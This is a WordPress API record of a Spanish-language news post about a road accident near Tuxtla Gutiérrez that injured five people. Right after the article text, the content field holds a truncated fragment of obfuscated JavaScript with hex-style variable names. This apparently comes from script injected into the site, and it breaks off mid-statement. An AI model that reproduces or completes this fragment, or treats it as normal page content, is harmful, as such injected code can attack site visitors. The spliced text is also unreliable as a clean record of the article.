{"id":8784,"date":"2023-02-22T04:02:34","date_gmt":"2023-02-22T04:02:34","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8784"},"modified":"2023-02-22T04:02:35","modified_gmt":"2023-02-22T04:02:35","slug":"fuerte-accidente-en-el-tramo-tuxtla-la-angostura-deja-cinco-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8784","title":{"rendered":"Fuerte accidente en el tramo Tuxtla-La Angostura deja cinco heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677038466384.jpg\" alt=\"\" class=\"wp-image-8785\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677038466384.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1677038466384-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente ocurrido este martes por la ma\u00f1ana en el tramo Tuxtla-La Angostura dej\u00f3 un saldo de cinco heridos.De acuerdo con los reportes oficiales sobre este accidente, fue una Nissan Urvan que cubre la ruta Tuxtla-Carranza corr\u00eda hac\u00eda la capital chiapaneca cuando se impact\u00f3 contra un cami\u00f3n de carga el cual a la altura del Kil\u00f3metro 6.5 di\u00f3 vuelta en U, e hizo corte de circulaci\u00f3n.Por ello, la Urvan se impact\u00f3 contra la pesada unidad.Por el golpe, el conductor, copiloto y tres pasajeros resultaron heridos, los cuales fueron trasladados a un nosocomio de la capital chiapaneca.El conductor de la pesada unidad escap\u00f3 del lugar para evadir su responsabilidad.Finalmente, las unidades fueron trasladadas a un corral\u00f3n en turno para determinar la responsabilidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 21 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte accidente ocurrido este martes por la ma\u00f1ana en el tramo Tuxtla-La Angostura dej\u00f3 un saldo de cinco heridos.De acuerdo con los reportes oficiales sobre este accidente, fue una Nissan Urvan que cubre la ruta Tuxtla-Carranza corr\u00eda hac\u00eda la capital chiapaneca cuando se impact\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8785,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8784","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8784"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8784\/revisions"}],"predecessor-version":[{"id":8786,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8784\/revisions\/8786"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8785"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}